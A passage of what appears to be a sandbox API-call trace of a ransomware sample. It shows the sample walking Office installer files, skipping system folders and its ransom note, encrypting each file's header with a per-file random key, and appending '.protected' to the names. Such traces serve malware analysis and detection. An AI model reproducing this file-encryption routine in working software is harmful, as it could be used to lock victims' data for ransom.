Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0061.323] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0061.323] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.435] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.435] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.435] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.520] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.607] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.607] CloseHandle (hObject=0xb4) returned 1 [0061.607] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0061.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0061.657] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.657] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Windows") returned -1 [0061.657] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Program Files") returned 1 [0061.657] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Program Files (x86)") returned 1 [0061.658] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="$Recycle.bin") returned 1 [0061.658] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="System Volume Information") returned -1 [0061.658] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.658] StrStrIW (lpFirst="ProPlusrWW.msi", lpSrch=".protected") returned 0x0 [0061.658] lstrcmpW (lpString1="ProPlusrWW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0061.658] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.658] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.673] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".txt") returned 0x0 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".rar") returned 0x0 [0061.710] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 81 [0061.710] StrStrW (lpFirst="ProPlusrWW.msi", lpSrch=".zip") returned 0x0 [0061.710] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.718] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.719] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.739] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.739] CloseHandle (hObject=0xb4) returned 1 [0061.739] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.protected") returned 91 [0061.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.protected")) returned 1 [0061.740] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Windows") returned -1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Program Files") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="Program Files (x86)") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="$Recycle.bin") returned 1 [0061.740] lstrcmpiW (lpString1="ProPlusrWW.xml", lpString2="System Volume Information") returned -1 [0061.740] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrIW (lpFirst="ProPlusrWW.xml", lpSrch=".protected") returned 0x0 [0061.740] lstrcmpW (lpString1="ProPlusrWW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0061.740] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.740] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.740] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".txt") returned 0x0 [0061.740] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.740] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".rar") returned 0x0 [0061.740] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 81 [0061.741] StrStrW (lpFirst="ProPlusrWW.xml", lpSrch=".zip") returned 0x0 [0061.741] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.762] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.762] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.763] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.763] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0061.779] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0061.779] CloseHandle (hObject=0xb4) returned 1 [0061.780] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.protected") returned 91 [0061.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.protected")) returned 1 [0061.780] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Windows") returned -1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Program Files") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="Program Files (x86)") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="$Recycle.bin") returned 1 [0061.780] lstrcmpiW (lpString1="ProPrWW.cab", lpString2="System Volume Information") returned -1 [0061.780] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.780] StrStrIW (lpFirst="ProPrWW.cab", lpSrch=".protected") returned 0x0 [0061.780] lstrcmpW (lpString1="ProPrWW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0061.780] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.780] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.780] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".txt") returned 0x0 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".rar") returned 0x0 [0061.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 78 [0061.781] StrStrW (lpFirst="ProPrWW.cab", lpSrch=".zip") returned 0x0 [0061.781] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.798] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.798] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0061.799] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.799] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.065] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.067] CloseHandle (hObject=0xb4) returned 1 [0062.067] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.protected") returned 88 [0062.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.protected")) returned 1 [0062.068] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Windows") returned -1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Program Files") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="Program Files (x86)") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="$Recycle.bin") returned 1 [0062.068] lstrcmpiW (lpString1="ProPrWW2.cab", lpString2="System Volume Information") returned -1 [0062.068] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.068] StrStrIW (lpFirst="ProPrWW2.cab", lpSrch=".protected") returned 0x0 [0062.068] lstrcmpW (lpString1="ProPrWW2.cab", lpString2="RESTORE_FILES.txt") returned -1 [0062.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".txt") returned 0x0 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".rar") returned 0x0 [0062.070] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab") returned 79 [0062.070] StrStrW (lpFirst="ProPrWW2.cab", lpSrch=".zip") returned 0x0 [0062.070] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.093] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.093] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.093] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.093] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.113] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.113] CloseHandle (hObject=0xb4) returned 1 [0062.113] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.protected") returned 89 [0062.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.protected")) returned 1 [0062.114] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0062.114] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0062.114] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.114] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0062.114] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0062.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.117] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.118] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0062.118] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0062.118] StrStrW (lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0062.118] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.127] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.127] WriteFile (in: hFile=0xb4, lpBuffer=0x4adad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4adad8*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.128] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.128] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.144] CloseHandle (hObject=0xb4) returned 1 [0062.145] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0062.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0062.145] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0062.145] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0062.145] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0062.145] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0062.145] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0062.145] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.145] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.145] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.146] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 